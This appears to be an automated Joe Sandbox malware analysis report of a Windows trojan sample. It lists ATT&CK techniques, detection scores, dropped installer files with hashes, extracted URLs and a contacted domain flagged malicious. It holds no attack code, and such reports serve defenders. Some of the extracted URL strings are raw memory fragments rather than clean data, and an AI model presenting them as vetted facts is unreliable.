Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	File Deletion1	Proc Filesystem	Virtualization/Sandbox Evasion21	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading31	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Virtualization/Sandbox Evasion21	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Process Injection3	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
o4c8AUtX1g.exe	29%	ReversingLabs	Win32.Trojan.Chapak

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Temp\MSI76CC.tmp	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Temp\MSI76CC.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI79F9.tmp	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Temp\MSI79F9.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\shi7515.tmp	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Temp\shi7515.tmp	0%	ReversingLabs
C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\AWSSDK.SimpleDB.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\Delimon.Win32.IO.dll	0%	Metadefender	Browse
C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\Delimon.Win32.IO.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\ICSharpCode.SharpZipLib.dll	0%	Metadefender	Browse
C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\ICSharpCode.SharpZipLib.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\Microsoft.Azure.KeyVault.Core.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\SslCertBinding.Net.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\System.Threading.Tasks.dll	0%	Metadefender	Browse
C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\System.Threading.Tasks.dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
9.2.plcd-player.exe.a70000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen8		Download File
9.2.plcd-player.exe.1270000.1.unpack	100%	Avira	HEUR/AGEN.1108168		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0	0%	Avira URL Cloud	safe
http://html4/loose.dtd	0%	Avira URL Cloud	safe
http://ocsp.startssl.com/sub/class2/code/ca0	0%	Avira URL Cloud	safe
http://crl.startssl.com/sfsca.crl0C	0%	Avira URL Cloud	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
https://currencysystem.com/gfx/pub/script-icon-16x16.gif	0%	Avira URL Cloud	safe
http://www.gesmes.org/xml/2002-08-01	0%	Avira URL Cloud	safe
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#	0%	Avira URL Cloud	safe
http://ocsp.startssl.com/ca00	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	0%	URL Reputation	safe
http://.css	0%	Avira URL Cloud	safe
http://crl.startssl.com/crtc2-crl.crl0	0%	Avira URL Cloud	safe
http://ocsp.sectigo.com0)	0%	Avira URL Cloud	safe
http://www.ecb.int/vocabulary/2002-08-01/eurofxref	0%	Avira URL Cloud	safe
http://www.MyBusinessCatalog.com	0%	Avira URL Cloud	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
https://currencysystem.com/gfx/pub/script-button-88x31.gif	0%	Avira URL Cloud	safe
http://aia.startssl.com/certs/sub.class2.code.ca.crt0#	0%	Avira URL Cloud	safe
https://currencysystem.com/gfx/pub/script-icon-16x16.png	0%	Avira URL Cloud	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://mybusinesscatalog.com0	0%	Avira URL Cloud	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
http://aia.startssl.com/certs/ca.crt02	0%	URL Reputation	safe
http://www.startssl.com/policy.pdf0	0%	Avira URL Cloud	safe
http://www.startssl.com/0	0%	Avira URL Cloud	safe
https://currencysystem.com/gfx/pub/script-button-88x31.png	0%	Avira URL Cloud	safe
http://.jpg	0%	Avira URL Cloud	safe
https://currencysystem.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
get.updates.avast.cn	unknown	unknown	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0	o4c8AUtX1g.exe	false	Avira URL Cloud: safe	unknown
http://html4/loose.dtd	o4c8AUtX1g.exe, 00000001.00000003.673805273.0000000003E90000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.openssl.org/support/faq.html....................rbwb.rndC:HOMERANDFILEPRNG	o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp	false		high
http://ocsp.startssl.com/sub/class2/code/ca0	o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, ssleay32.dll.3.dr	false	Avira URL Cloud: safe	unknown
http://crl.startssl.com/sfsca.crl0C	o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, ssleay32.dll.3.dr	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	o4c8AUtX1g.exe	false	URL Reputation: safe	unknown
http://apache.org/xml/UnknownNSUCS4UCS-4UCS_4UTF-32ISO-10646-UCS-4UCS-4	o4c8AUtX1g.exe, 00000001.00000003.706016324.0000000005969000.00000004.00000001.sdmp, plcd-player.exe, 00000009.00000002.934202867.0000000000CDA000.00000002.00020000.sdmp, plcd-player.exe.3.dr	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	o4c8AUtX1g.exe	false	URL Reputation: safe	unknown
http://ocsp.sectigo.com0	o4c8AUtX1g.exe, icuio58.dll.3.dr	false	URL Reputation: safe	unknown
http://www.openssl.org/V	o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, ssleay32.dll.3.dr	false		high
http://www.unicode.org/copyright.html	icuio58.dll.3.dr	false		high
https://currencysystem.com/gfx/pub/script-icon-16x16.gif	o4c8AUtX1g.exe, 00000001.00000003.703979629.0000000005640000.00000004.00000001.sdmp, currencysystem4.js.3.dr	false	Avira URL Cloud: safe	unknown
https://www.nuget.org/packages/Azure.Security.KeyVault.Keys	o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, Microsoft.Azure.KeyVault.Core.dll.1.dr	false		high
http://www.gesmes.org/xml/2002-08-01	o4c8AUtX1g.exe, 00000001.00000003.703979629.0000000005640000.00000004.00000001.sdmp, ecb-eurofxref-daily.xml.3.dr	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#	o4c8AUtX1g.exe	false	Avira URL Cloud: safe	unknown
http://ocsp.startssl.com/ca00	o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, ssleay32.dll.3.dr	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	o4c8AUtX1g.exe	false	URL Reputation: safe	unknown
http://.css	o4c8AUtX1g.exe, 00000001.00000003.673805273.0000000003E90000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://aka.ms/azsdkvalueprop.	o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, Microsoft.Azure.KeyVault.Core.dll.1.dr	false		high
http://crl.startssl.com/crtc2-crl.crl0	o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, ssleay32.dll.3.dr	false	Avira URL Cloud: safe	unknown
http://ocsp.sectigo.com0)	o4c8AUtX1g.exe	false	Avira URL Cloud: safe	low
http://www.ecb.int/vocabulary/2002-08-01/eurofxref	o4c8AUtX1g.exe, 00000001.00000003.703979629.0000000005640000.00000004.00000001.sdmp, ecb-eurofxref-daily.xml.3.dr	false	Avira URL Cloud: safe	unknown
http://icu-project.org	o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, icuio58.dll.3.dr	false		high
http://www.MyBusinessCatalog.com	o4c8AUtX1g.exe, 00000001.00000003.703979629.0000000005640000.00000004.00000001.sdmp, License.txt.1.dr	false	Avira URL Cloud: safe	unknown
http://www.openssl.org/support/faq.html	o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp	false		high
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, icuio58.dll.3.dr	false	URL Reputation: safe	unknown
https://www.nuget.org/packages/Azure.Security.KeyVault.Certificates	o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, Microsoft.Azure.KeyVault.Core.dll.1.dr	false		high
https://currencysystem.com/gfx/pub/script-button-88x31.gif	o4c8AUtX1g.exe, 00000001.00000003.703979629.0000000005640000.00000004.00000001.sdmp, currencysystem4.js.3.dr	false	Avira URL Cloud: safe	unknown
http://aia.startssl.com/certs/sub.class2.code.ca.crt0#	o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, ssleay32.dll.3.dr	false	Avira URL Cloud: safe	unknown
https://currencysystem.com/gfx/pub/script-icon-16x16.png	o4c8AUtX1g.exe, 00000001.00000003.703979629.0000000005640000.00000004.00000001.sdmp, currencysystem5.js.3.dr, currencysystem5.json.3.dr	false	Avira URL Cloud: safe	unknown
https://www.nuget.org/packages/Azure.Security.KeyVault.Secrets	o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, Microsoft.Azure.KeyVault.Core.dll.1.dr	false		high
https://www.thawte.com/cps0/	o4c8AUtX1g.exe, 00000001.00000003.666504324.0000000003C10000.00000004.00000001.sdmp, MSI79F9.tmp.1.dr	false		high
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, icuio58.dll.3.dr	false	URL Reputation: safe	unknown
https://www.thawte.com/repository0W	o4c8AUtX1g.exe, 00000001.00000003.666504324.0000000003C10000.00000004.00000001.sdmp, MSI79F9.tmp.1.dr	false		high
http://mybusinesscatalog.com0	o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, ssleay32.dll.3.dr	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0D	o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, icuio58.dll.3.dr	false	URL Reputation: safe	unknown
http://aia.startssl.com/certs/ca.crt02	o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, ssleay32.dll.3.dr	false	URL Reputation: safe	unknown
http://apache.org/xml/messages/XML4CErrors#FIXEDEBCDIC-CP-USIBM037IBM1047IBM-1047IBM1140IBM01140CCSI	o4c8AUtX1g.exe, 00000001.00000003.706016324.0000000005969000.00000004.00000001.sdmp, plcd-player.exe, 00000009.00000002.934202867.0000000000CDA000.00000002.00020000.sdmp, plcd-player.exe.3.dr	false		high
http://www.startssl.com/policy.pdf0	o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, ssleay32.dll.3.dr	false	Avira URL Cloud: safe	unknown
https://www.advancedinstaller.com	o4c8AUtX1g.exe, 00000001.00000003.666504324.0000000003C10000.00000004.00000001.sdmp, MSI79F9.tmp.1.dr	false		high
https://secure.comodo.com/CPS0L	o4c8AUtX1g.exe, 00000001.00000003.706113597.0000000005A36000.00000004.00000001.sdmp, AWSSDK.SimpleDB.dll.1.dr	false		high
http://www.startssl.com/0	o4c8AUtX1g.exe, 00000001.00000003.706357287.0000000005BBE000.00000004.00000001.sdmp, ssleay32.dll.3.dr	false	Avira URL Cloud: safe	unknown
https://currencysystem.com/gfx/pub/script-button-88x31.png	o4c8AUtX1g.exe, 00000001.00000003.703979629.0000000005640000.00000004.00000001.sdmp, currencysystem5.js.3.dr, currencysystem5.json.3.dr	false	Avira URL Cloud: safe	unknown
http://.jpg	o4c8AUtX1g.exe, 00000001.00000003.673805273.0000000003E90000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://apache.org/xml/messages/XMLValidityWINDOWS-1252XERCES-XMLCHhttp://apache.org/xml/messages/XML	o4c8AUtX1g.exe, 00000001.00000003.706016324.0000000005969000.00000004.00000001.sdmp, plcd-player.exe, 00000009.00000002.934202867.0000000000CDA000.00000002.00020000.sdmp, plcd-player.exe.3.dr	false		high
https://currencysystem.com	currencysystem5.json.3.dr	false	Avira URL Cloud: safe	unknown

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	508575
Start date:	25.10.2021
Start time:	11:39:45
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	o4c8AUtX1g (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal69.troj.evad.winEXE@10/55@1/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 1.9% (good quality ratio 1.9%) Quality average: 91.5% Quality standard deviation: 14.3%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115, 173.222.108.226, 173.222.108.210, 20.82.210.154, 20.54.110.249, 40.112.88.60, 52.251.79.25, 80.67.82.235, 80.67.82.211, 20.50.102.62 Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/508575/sample/o4c8AUtX1g.exe

Simulations

Behavior and APIs

Time	Type	Description
11:40:45	API Interceptor	1x Sleep call for process: o4c8AUtX1g.exe modified
11:41:10	API Interceptor	2x Sleep call for process: plcd-player.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\MSI76CC.tmp	farcry6_repack.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\MSI79F9.tmp	farcry6_repack.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\shi7515.tmp	e6d90883fd0e3c7576c140d6f12e04e1e54c3789ec4b2.exe	Get hash	malicious	Browse
	tconnect_HCP_Software_v301_Installer.msi	Get hash	malicious	Browse
	mWvxXYwvqU.exe	Get hash	malicious	Browse
	farcry6_repack.exe	Get hash	malicious	Browse
	yvY2AMOxwb.exe	Get hash	malicious	Browse
	EpAIWOPmnA.exe	Get hash	malicious	Browse
	EpAIWOPmnA.exe	Get hash	malicious	Browse
	YSy9zYFtB2.exe	Get hash	malicious	Browse
	WFrmiIfWt5.exe	Get hash	malicious	Browse
	eAlTRSN46u.exe	Get hash	malicious	Browse
	uhwBmJGGqo.exe	Get hash	malicious	Browse
	fPPE8cHbql.exe	Get hash	malicious	Browse
	qB6P2WfUjb.exe	Get hash	malicious	Browse
	qB6P2WfUjb.exe	Get hash	malicious	Browse
	xuXoY85NmR.exe	Get hash	malicious	Browse
	DF7049B8C4D704376BE3920232B1BA6B2C8CF2FF0F9CF.exe	Get hash	malicious	Browse
	DF7049B8C4D704376BE3920232B1BA6B2C8CF2FF0F9CF.exe	Get hash	malicious	Browse
	9c9cdb438163a2e64adcb398a6f1f1abcdc81c1cf35ab.exe	Get hash	malicious	Browse
	zEQyeKgNgG.exe	Get hash	malicious	Browse
	WP6TzYzWmG.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Config.Msi\440bbf.rbs Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	modified
Size (bytes):	5083
Entropy (8bit):	5.641804540600664
Encrypted:	false
SSDEEP:	96:JUblaV4pDyj0onGIlKjeRhmgKpdGUO7PVRGlmO1fRRDPCW9mJ+x9DZdR0qR0hwN1:JUvp2j0on2jeRhmgSGUO7NRG315RDPCU
MD5:	F1D4BF5FDB8005BECDBAA13E74F461A6
SHA1:	40D5531268D2ACE0D91E25F4F54A604FF3959FB2
SHA-256:	6BC13A98E8CBC3551B352D6B5005F5677E13773923FA0402B4F8653DF7FBF5ED
SHA-512:	AA3AF871AEDFCE520208FE815C72A983EDFAB1D9BAFAD6F299B4DE7619617F9A6D94895EFD4CBB97FA02453054DB52BEE9A7B7BBE418CD60BE8E5F60B8CB3DD2
Malicious:	false
Reputation:	low
Preview:	...@IXOS.@.....@"]YS.@.....@.....@.....@.....@.....@......&.{4A523951-0A2F-4D65-A31E-BB22D0CE0CF4}..JDesktop Tools..adv.msi.@.....@.....@.....@........&.{D9FF1A35-78F9-49F0-A6A0-DB3A11387835}.....@.....@.....@.....@.......@.....@.....@.......@......JDesktop Tools......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{F5BA1B6B-756B-4B40-A5CB-A8A21E79DAE6}&.{4A523951-0A2F-4D65-A31E-BB22D0CE0CF4}.@......&.{FC3D5B52-2561-4633-85CB-6F8B8A86F2F9}&.{4A523951-0A2F-4D65-A31E-BB22D0CE0CF4}.@......&.{8C82D735-0397-4468-B16C-3DB17F7A7006}&.{4A523951-0A2F-4D65-A31E-BB22D0CE0CF4}.@......&.{0B568A04-369C-43FB-98E4-C437A15709E0}&.{4A523951-0A2F-4D65-A31E-BB22D0CE0CF4}.@......&.{D0054317-E107-45C9-BD82-07B794597760}&.{4A523951-0A2F-4D65-A31E-BB22D0CE0CF4}.@......&.{4CE558F3-30D7-4710-8A30-53FF7CA0A97F}&.{4A523951-0A2F-4D65-A31E-BB22D0CE0CF4}.@......&.{A396B091-4840-44D8-ADD7-69BE85386878}&.{4A523951-0A2F-4D65-A3

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Users\user\Desktop\o4c8AUtX1g.exe
File Type:	Microsoft Cabinet archive data, 61157 bytes, 1 file
Category:	dropped
Size (bytes):	61157
Entropy (8bit):	7.995991509218449
Encrypted:	true
SSDEEP:	1536:ppUkcaDREfLNPj1tHqn+ZQgYXAMxCbG0Ra0HMSAKMgAAaE1k:7UXaDR0NPj1Vi++xQFa07sTgAQ1k
MD5:	AB5C36D10261C173C5896F3478CDC6B7
SHA1:	87AC53810AD125663519E944BC87DED3979CBEE4
SHA-256:	F8E90FB0557FE49D7702CFB506312AC0B24C97802F9C782696DB6D47F434E8E9
SHA-512:	E83E4EAE44E7A9CBCD267DBFC25A7F4F68B50591E3BBE267324B1F813C9220D565B284994DED5F7D2D371D50E1EBFA647176EC8DE9716F754C6B5785C6E897FA
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	MSCF............,...................I........t........*S{I .authroot.stl..p.(.5..CK..8U....u.}M7{v!.\D.u.....F.eWI.!e..B2QIR..$4.%.3eK$J. ......9w4...=.9..}...~....$..h..ye.A..;....\|. O6.a0xN....9..C..t.z.,..d`.c...(5.....<..1.\|..2.1.0.g.4yw..eW.#.x....+.oF....8.t...Y....q.M.....HB.^y^a...)..GaV"\|..+.'..f..V.y.b.V.PV......`..9+..\0.g...!.s..a....Q...........~@$.....8..(g..tj....=,V)v.s.d.].xqX4.....s....K..6.tH.....p~.2..!..<./X......r.. ?(.\[. H...#?.H.".. p.V.}.`L...P0.y....\|...A..(...&..3.ag...c..7.T=....ip.Ta..F.....'..BsV...0.....f....Lh.f..6....u.....Mqm.,...@.WZ.={,;.J...)...{_Ao....T......xJmH.#..>.f..RQT.Ul(..AV..\|.!k0...\|\......U2U..........,9..+.\R..(.[.'M........0.o..,.t.#..>y.!....!X<o.....w...'......a.'..og+>..\|.s.g.Wr.2K.=...5.YO.E.V.....`.O..[.d.....c..g....A..=....k..u2..Y.}.......C...\=...&...U.e...?...z.'..$..fj.'\|.c....4y.".T.....X....@xpQ.,.q.."...t.... $.F..O.A.o_}d.3...z...F?..-...Fy...W#...1......T.3....x.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Users\user\Desktop\o4c8AUtX1g.exe
File Type:	data
Category:	dropped
Size (bytes):	326
Entropy (8bit):	3.096153500626319
Encrypted:	false
SSDEEP:	6:kKJw/2dFN+SkQlPlEGYRMY9z+4KlDA3RUeOlEfcTt:So2kPlE99SNxAhUefit
MD5:	B9FB343D52D6EA10E38A1F41F0622A0E
SHA1:	DA2C853B0EA5F7DC80C47F4FFEB331765737E019
SHA-256:	4CB0FFB319DBB81BEC8D15854336AE9033D886254C66A70A2865CB37FB6BFE06
SHA-512:	D4185C6946ACC58EDDBC42747F88D7A8EBBC648CEDECFB9FCA776FDD0EB4FA4830FA85325D9F2C48E7945217D548E6E709070FC7D500BB166E064186752320C4
Malicious:	false
Reputation:	low
Preview:	p...... ........K].b....(....................................................... ...........^.......$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.a.a.8.a.1.5.e.a.6.d.7.1.:.0."...

C:\Users\user\AppData\Local\Temp\MSI76CC.tmp Download File
Process:	C:\Users\user\Desktop\o4c8AUtX1g.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	402912
Entropy (8bit):	6.383799484265228
Encrypted:	false
SSDEEP:	6144:hsEQsy5dfBkvAUnBU76LNaiDWbqw0EAOqcmCIVKVPgvf:4sw6vAUnBU7qax0EzIVYgvf
MD5:	3D24A2AF1FB93F9960A17D6394484802
SHA1:	EE74A6CEEA0853C47E12802961A7A8869F7F0D69
SHA-256:	8D23754E6B8BB933D79861540B50DECA42E33AC4C3A6669C99FB368913B66D88
SHA-512:	F6A19D00896A63DEBB9EE7CDD71A92C0A3089B6F4C44976B9C30D97FCBAACD74A8D56150BE518314FAC74DD3EBEA2001DC3859B0F3E4E467A01721B29F6227BA
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: farcry6_repack.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@p..!..!..!..J..!..J...!...T..!...T..!...T...!..J..!..J..!..J..!..!... ...T...!...T..!...T..!..!..!...T..!..Rich.!..................PE..L...".Ia.........."!.........*......6\|.......................................P......k.....@.........................p.......D...........0........................A...8..p...................@:......H9..@...............$............................text...6........................... ..`.rdata..8...........................@..@.data...............................@....rsrc...0...........................@..@.reloc...A.......B..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI79F9.tmp Download File
Process:	C:\Users\user\Desktop\o4c8AUtX1g.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	887264
Entropy (8bit):	6.436854443892135
Encrypted:	false
SSDEEP:	24576:gJgZXlAIjfQhETbF+RWQNgXAo1sVz1v0Mny+PkfsJJ10FRzVTv:F/fQhksQQNgXAo1sVzhly+PkfsJJ10FT
MD5:	0BE6E02D01013E6140E38571A4DA2545
SHA1:	9149608D60CA5941010E33E01D4FDC7B6C791BEA
SHA-256:	3C5DB91EF77B947A0924675FC1EC647D6512287AA891040B6ADE3663AA1FD3A3
SHA-512:	F419A5A95F7440623EDB6400F9ADBFB9BA987A65F3B47996A8BB374D89FF53E8638357285485142F76758BFFCB9520771E38E193D89C82C3A9733ED98AE24FCB
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: farcry6_repack.exe, Detection: malicious, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$............................4................................................3......3......3.?.....W....3......Rich............................PE..L.....Ia.........."!................................................................KC....@.............................t...d........................p..........T.......p...................@.......h...@............................................text............................... ..`.rdata..............................@..@.data...4...........................@....rsrc................\|..............@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\shi7515.tmp Download File
Process:	C:\Users\user\Desktop\o4c8AUtX1g.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3440640
Entropy (8bit):	6.332754172601424
Encrypted:	false
SSDEEP:	49152:iGfM3glOz6pNbH2qLG1cWJ2asQceg4LApnrkLgQ63lOT0q4Fn6rmLn:Lc3wFeyCulhqUn
MD5:	59A74284EACB95118CEDD7505F55E38F
SHA1:	ACDC28D6A1EF5C197DE614C46BA07AEAEB25B50B
SHA-256:	7C8EA70CA8EFB47632665833A6900E8F2836945AA80828B30DA73FBF4FCAF4F5
SHA-512:	E69A82ADC2D13B413C0689E9BF281704A5EF3350694690BA6F3FE20DA0F66396245B9756D52C37166013F971C79C124436600C373544321A44D71F75A16A2B6A
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
